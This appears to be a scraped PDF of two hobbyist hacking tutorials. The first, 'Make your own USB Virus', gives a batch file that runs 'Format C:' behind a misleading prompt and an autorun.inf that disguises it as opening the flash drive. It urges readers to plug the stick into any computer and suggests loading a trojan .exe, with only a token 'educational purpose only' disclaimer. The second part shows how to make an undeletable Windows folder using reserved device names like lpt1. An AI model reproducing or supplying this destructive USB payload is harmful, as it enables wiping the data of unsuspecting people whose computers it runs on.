Usbvirusfolderundelete 111110021717 Phpapp02 PDF

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Created By Ayan For http://download-at-now.blogspot.


Make your own USB Virus

In this tutorial I am going to teach you how to make a USB stick autorun a virus.

this is educational purpose only! i

Step 1: Format your USB Stick

Step 2: Open Notepad and put in the following...

@echo off
title Delete C:\
echo Are you sure you want to delete all your files? (y/n)
pause > nul
echo Deleting files......
Format C:
Save this as XXX.bat to the root of your USB Stick.

Step 3: Open Notepad again and put in the following...

icon=(name of your icon).ico
action=Click here to open your flash drive.

^^Save this as autorun.inf *Make sure you take out the () when you put in your icons
name, and you have to save the icon you have on the root of the USB Stick.*

Step 4: You are done! Feel free to change it up a little, you can make XXX.bat load up an
.exe, so if you have a trojan that is .exe then you can make it load that, make sure that you
include where it is loading the file from.

Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The
USB Stick should format the C: drive therefore deleting all files.

Thank you!

have fun..

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Created By Ayan For

Making Undeleteable Folder...

We can actually make folders that cannot be deleted in Windows OS.
It must be made using Command Prompt.
It can only be deleted using Command Prompt.

1.Go to cmd.
2.Change to the directory that you want.
3.Assume i change to D:
4.So,in Command Prompt,type D: and [enter].
5.Type in this command "md \lpt1\\" without quotes and press enter.
6.The folder will now in your D:
7.Go and try and delete or rename it,you cannot do anything to it.

There are still many names that you can use to name the folder:
-lpt1 until lpt9

To delete it:
1.Go to Command Prompt again.
2.Navigate to the directory.
3.Type in rd \lpt1\\

Hope can help you all...

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